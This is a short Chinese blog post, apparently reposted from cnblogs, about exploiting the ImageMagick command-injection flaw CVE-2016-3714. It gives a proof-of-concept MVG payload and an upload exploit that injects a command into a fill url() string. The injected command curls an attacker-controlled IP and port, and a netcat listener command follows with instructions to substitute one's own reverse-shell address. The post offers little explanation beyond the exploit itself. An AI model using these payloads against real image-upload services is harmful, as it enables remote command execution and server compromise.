CVE-2016-3714-ImageMagick 漏洞利用 - 走看看

zoukankan html css js c++ java

CVE-2016-3714-ImageMagick 漏洞利用
漏洞简介：/etc/ImageMagick/delegates.xml 将%s，%l加入到command里造成了命令执行

利用方式：

poc代码：
push graphic-context viewbox 0 0 640 480 fill 'url(https://"| command")' pop graphic-context
　　

图片上传点，抓包，附上exp代码：

push graphic-context
viewbox 0 0 640 480
fill 'url(https://"| curl 172.16.20.108:8888")'
pop graphic-context

ip：你要反弹的shell地址，2333端口号，服务器监听反弹shell。
nc -lvp 8888
查看全文

相关阅读:
python 全局变量与局部变量
 Python 百分号字符串拼接
 Python集合的基本操作
 sorted by value in dict python
gVim vundle
vim config
vim move the cursor in a long sentence
步步为营-37-自动生成数据库连接字符串
 步步为营-36-ADO.Net简介
 步步为营-35-SQL语言基础

原文地址：https://www.cnblogs.com/junsec/p/11166015.html

Copyright © 2011-2022 走看看